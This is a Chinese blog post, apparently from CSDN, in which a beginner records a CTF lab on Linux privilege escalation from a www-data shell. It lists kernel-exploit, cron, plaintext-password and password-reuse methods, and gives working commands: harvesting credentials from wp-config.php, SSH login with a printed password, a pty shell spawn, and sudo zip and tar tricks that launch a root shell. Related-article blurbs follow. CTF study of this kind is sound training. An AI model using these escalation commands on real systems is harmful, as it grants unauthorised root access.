小白学习CTF第十一天-web安全提权

最新推荐文章于 2024-04-21 22:29:03 发布

bbhh1139

最新推荐文章于 2024-04-21 22:29:03 发布

阅读量2.2k

点赞数

文章标签： linux 安全 ssh

本文链接：https://blog.youkuaiyun.com/bbhh1139/article/details/105785295

版权

本文详细介绍了从www-data权限开始的Web安全提权过程，包括内核漏洞利用、明文root密码获取、计划任务利用、密码复用技巧、SSH远程登录、sudo权限提升等关键步骤。通过具体操作如配置文件挖掘、zip与tar命令的巧妙运用，最终实现权限提升并获取flag。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

web安全提权

在这里插入图片描述

提权介绍

在这里插入图片描述
根据之前得到www-data权限，准备进行提权：

内核漏洞提权

在这里插入图片描述

明文root密码提权

在这里插入图片描述

计划任务

在这里插入图片描述

密码复用

在这里插入图片描述

sudo -l
cd /home
cd zico
ls -alh(发现ssh隐藏文件，wordpress)
cd wordpress(挖掘配置文件，发现wp-config.php)
cat wp-config.php(密码复用)
ssh zico@ip(远程登陆)
sWfCsfJSPV9H3AmQzw8
python -c "import pty;pty.spawn('/bin/bash')"
sudo -l(提权提示)

在这里插入图片描述

ssh如果出现类似的警告：使用后面的处理办法。

mv /root/.ssh/known_hosts /tmp
之后再次使用ssh登陆即可正常使用了。

//利用zip进行提权
touch exploit
sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"

//利用tar进行提权
sudo -u root tar cf /dev/null exploit -checkpoint=1 --checkpoint-action="/bin/bash"

在这里插入图片描述

获取flag

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

bbhh1139

关注关注

0
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例（一）

杨秀璋的专栏

04-10

1万+

这是作者的网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您们喜欢，一起进步。前文分享了SMBv3服务远程代码执行漏洞（CVE-2020-0796），攻击者可能利用此漏洞远程无需用户验证，执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目，采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧，作者选择了Vulnhub靶场，希望深入分析来

[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用（二）

热门推荐

杨秀璋的专栏

04-11

1万+

这是作者的网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您们喜欢，一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目，采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用，通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章，希望对您有所帮助。

参与评论您还未登录，请先登录后发表或查看评论

CTF Web学习笔记

01-11

CTF Web学习笔记，包含杂项和WEB两部分，包含杂项简介，WEB知识点总结以及Web常用套路总结。

CTF中对web服务器各种提权姿势

weixin_30343157的博客

06-19

676

在我们拿下服务器web服务往往只是低权限用户，对于内网渗透，我们往往需要root权限，Linux系统提权包括使用溢出漏洞已及利用系统配置文件。提权前提：　　1.拿到低权限shell 　　2.被入侵机器上有nc，python，perl等常见linux下的工具　　3.有权上传下载文件 1.利用内核漏洞通杀内核漏洞十分少见，因此我们先应对系统相关进行信息...

CTF-提权

su__xiaoyan的博客

01-06

2387

提权通过Web服务拿下服务器的基础权限以后（www-data），如何提权值最高的系统权限（root）。提权的前提条件：获取服务器的基础权限。能上传或者下载文件。靶机上面有常见工具或者环境，例如nc，python或者Perl。 Linux操作系统提权方法：利用内核漏洞进行提权利用错误的系统配置进行提权明文密码提权计划任务提权密码复用提权内核漏洞提权首先查看系统Linux的发行版本： cat /etc/issue cat /etc/*-release 查看内核版本

web安全：mysql提权总结篇

kali_Ma的博客

10-24

4684

前言前两天参加了省赛的内网渗透，在拿到webshell后发现是一个站库分离，通过信息搜集得到了数据库的账号密码，但是是一个www-data权限，执行不了代理的命令，这时候就需要提权到root权限才能够执行命令，最后还没有通过udf提权，而是通过/tmp这个目录能够修改权限，改为777权限后使用的代理。因为linux打得比较少，我们队在这个地方卡了很久，导致只打到了第一层网络，第二层内网就没有时间去打，所以补一下关于mysql的提权知识。 UDF提权何为UDF UDF是mysql的一个拓展接口，UDF（U

项目三探索并利用漏洞对未知web server权限提升（CTF实战 Kioptrix#2靶机渗透测试）

王先生的蒋小姐的博客

07-20

1584

大家好，我是SuieKa。此是实训项目三，要求根据未知靶机（Kioptrix#2）探索漏洞，并利用漏洞进行权限提升实验项目，希望对朋友们有所帮助。树一、神器开路，对未知操作系统的全面扫描二、利用探索的漏洞获取shell三、权限提升并获取关键字（hiroshima）所谓CTF:CTF是一种流行的信息安全竞赛形式，其英文名可直译为“夺得Flag”，也可意译为“夺旗赛”。其大致流程是，参赛团队之间通过进行攻防对抗、程序分析等形式，率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容，并将其提交

WEB漏洞攻防 - 文件上传漏洞 - CTF比赛类应用场景 - [RoarCTF 2024]Simple Upload

2401_84009317的博客

04-21

856

现在我们去搜索 “ThinkPHP3.2版本” 开发手册,找到 URL 模块的相关文档,了解 “ThinkPHP3.2版本” 如何通通过 URL 对应的代码关系请求到访问的文件从 “ThinkPHP3.2版本” 开发手册中我们了解到 “PATHINFO模式” 是系统的默认 URL 模式，提供了最好的 SEO 支持，系统内部已经做了环境的兼容处理，所以能够支持大多数的主机环境。PATHINFO地址的前三个参数分别表示模块/控制器/操作。示例:参考上面的 URL 链接模块 --> home控制器 --

CTF Web学习（二）----代码审计、burp suite应用

网络猿的博客

01-10

1386

CTF Web学习（二）代码审计、burp suite应用 CTF Web学习目录链接 CTF Web学习（一）：基础篇及头文件修改、隐藏 CTF Web学习（二）：代码审计、burp suite应用文章目录CTF Web学习（二）前言一、BugKu Web题（一）BugKu Web5 矛盾（二）BugKu Web8 文件包含（三）BugKu Web9 flag In the variable !（四）BugKu Web11 网站被黑了黑客会不会留下后门（五）BugKu Web12 本地管理员（六

BugkuCTF-WEB-第43题到第52题

Alita_lxz的博客

11-04

1318

BugkuCTF-WEB-第43题到第52题

Web的基本漏洞--提权

尽欢

06-05

659

提权的介绍

完成ubuntu-ctf靶机渗透最终提权得到shell权限

m0_60319766的博客

02-17

4353

完成ubuntu-ctf靶机渗透最终提权得到shell权限

CTF-常见的几种web提权方法

Reaches_r的博客

08-10

1833

1.内核漏洞提权 2.明文密码暴力破解3.计划任务 4.密码复用 5.利用zip、tar提权

15.CTF-web安全提权

woo233的博客

09-29

2306

往往我们能拿下服务器的web服务只是具有低权限用户(www-data)，对于内网渗透，我们需要提权到root。Linux系统的提权过程不止涉及到了漏洞，也涉及了很多系统配置。提权前提:已经拿到低权shell被入侵的机器上面有nc，python，perl等linux非常常见的工具有权限上传文件和下载文件。

CTF-普通用户提权

IT小学子的博客

05-03

3427

文章目录提权前提：1. 利用内核漏洞2. 利用明文root密码提权3. 利用定时计划任务4. 密码复用5. 利用zip提权在我们拿下服务器web服务往往只是低权限用户，对于内网渗透，我们往往需要root权限，Linux系统提权包括使用溢出漏洞已及利用系统配置文件。提权前提：　　1.拿到低权限shell 　　2.被入侵机器上有nc，python，perl等常见linux下的工具　...

-------已搬运--BUUCTF：[SWPU2019]Web3 --- jwt 的secret的获取 --- unzip的软练级攻击

Zero_Adam的博客

04-20

1480

目录：000、知识点1.os.path.dirname2. unzip 和下面这个zip一块的，没必要看，遇到题目的时候现搜就行。3. zipfile一、自己做：2.看一看WP二、学到的：三、学习WP 重点，我感觉是 jwt 的那块是个点，有乱码之后要寻找secret，然后可用404来获取jwt的secret，再是unzip的软连接攻击这个东西，以前没见过的。学习一下Linux的软连接，然后再来修改修改 000、知识点 1.os.path.dirname python3 获取当前路径及os.pat

2023VNCTF Web

v2ish1yan的博客

02-19

1315

这题在机场等同学的时候做了一下，但是那个解压功能一直报错，我还以为是我的问题，结构第二天做一下发现是可以的goeval代码注入filepath.Clean构造任意解压路径。

BUUCTF [SWPU2019] Web3

Senimo

12-20

952

BUUCTF [SWPU2019] Web3 考点：启动环境：首先是一个登陆页面，标题为：CTF-Flask-Demo，推测其应为Flask所编写，尝试使用admin用户登陆：用户名：admin、密码：admin，登陆成功：又尝试了几个登陆密码，应该是没有验证，随便登陆其中有文件上传功能，点击upload：提示权限不足，考虑其为session判断权限，使用BurpSuite查看页面Cookie信息：注：在Flask中，session是保存在Cookie中，也就是本地，所以可以直接读取其内

CTF--Fcrackzip解题

qq_40730029的博客

04-28

1134

仅对CTF部分题目有效(对.zip文件) 在kali里安装fcrackzip apt-get install fcrackzip 安装好之后在wordlists里会有一个rockyou.txt.gz文件,将该文件解压后如下图 gzip -d rockyou.txt.gz 将压缩包暴力破解得到密码 fcrackzip -D -u -p /usr/share/wordlists/rockyou....

CTFHUB----web前置技能-rce